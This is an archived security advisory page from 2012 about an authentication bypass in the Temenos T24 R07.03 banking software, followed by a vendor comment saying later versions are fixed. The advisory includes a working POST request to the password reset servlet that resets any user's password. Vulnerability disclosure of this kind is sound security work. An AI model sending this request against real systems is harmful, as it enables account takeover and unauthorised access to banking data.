Twenty Year Anniversary

Temenos T24 R07.03 Authentication Bypass

Temenos T24 R07.03 Authentication Bypass
Posted Jul 31, 2012
Authored by Dionach

Temenos T24 R07.03 suffers from an authentication bypass vulnerability as it fails to properly enforce access control on the password reset functionality.

tags | exploit, bypass
MD5 | 8193c90bebc266d380bad904698efe10

Temenos T24 R07.03 Authentication Bypass

Change Mirror Download
TEMENOS T24 R07.03 authentication bypass

Class: Access Validation Error
Remote: Yes
Local: No
Published: 26/06/2012
Credit: Raymond Rizk of Dionach Limited (vulns@dionach.com)

Vulnerable: TEMENOS T24 R07.03

TEMENOS T24 is prone to an authentication bypass vulnerability as it fails to properly enforce access control on the password reset functionality.

An attacker may leverage this issue to reset any user’s password and login as that user. This would have an impact on the confidentiality, integrity and availability of data stored in the application. This would also have an impact on accountability.

TEMENOS T24 R07.03 is known to be vulnerable. Other versions may also be vulnerable.

An attacker can use a browser to exploit this vulnerability. This can be seen in the following example:

POST http://127.0.0.1/servlet/BrowserServlet
command=repeatpassword&requestType=UTILITY.ROUTINE&routineName=OS.PASSWORD&routineArgs=PROCESS.REPEAT%3AUSERNAME%3APASSWORD%3APASSWORD

Vendor is aware of this vulnerability.

Comments (1)

RSS Feed Subscribe to this comment feed
temenossecurity

This is already fixed in a later patch. If customers on T24 R07.03 are concerned, please contact the helpdesk or your account manager. All later version R08 - R12 are unaffected by this issue.

Comment by temenossecurity
2012-07-31 13:15:49 UTC | Permalink | Reply
Login or Register to post a comment

Want To Donate?


Bitcoin: 18PFeCVLwpmaBuQqd5xAYZ8bZdvbyEWMmU

File Archive:

August 2018

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Aug 1st
    19 Files
  • 2
    Aug 2nd
    17 Files
  • 3
    Aug 3rd
    16 Files
  • 4
    Aug 4th
    1 Files
  • 5
    Aug 5th
    1 Files
  • 6
    Aug 6th
    19 Files
  • 7
    Aug 7th
    15 Files
  • 8
    Aug 8th
    9 Files
  • 9
    Aug 9th
    7 Files
  • 10
    Aug 10th
    10 Files
  • 11
    Aug 11th
    1 Files
  • 12
    Aug 12th
    0 Files
  • 13
    Aug 13th
    14 Files
  • 14
    Aug 14th
    18 Files
  • 15
    Aug 15th
    38 Files
  • 16
    Aug 16th
    5 Files
  • 17
    Aug 17th
    0 Files
  • 18
    Aug 18th
    0 Files
  • 19
    Aug 19th
    0 Files
  • 20
    Aug 20th
    0 Files
  • 21
    Aug 21st
    0 Files
  • 22
    Aug 22nd
    0 Files
  • 23
    Aug 23rd
    0 Files
  • 24
    Aug 24th
    0 Files
  • 25
    Aug 25th
    0 Files
  • 26
    Aug 26th
    0 Files
  • 27
    Aug 27th
    0 Files
  • 28
    Aug 28th
    0 Files
  • 29
    Aug 29th
    0 Files
  • 30
    Aug 30th
    0 Files
  • 31
    Aug 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2018 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close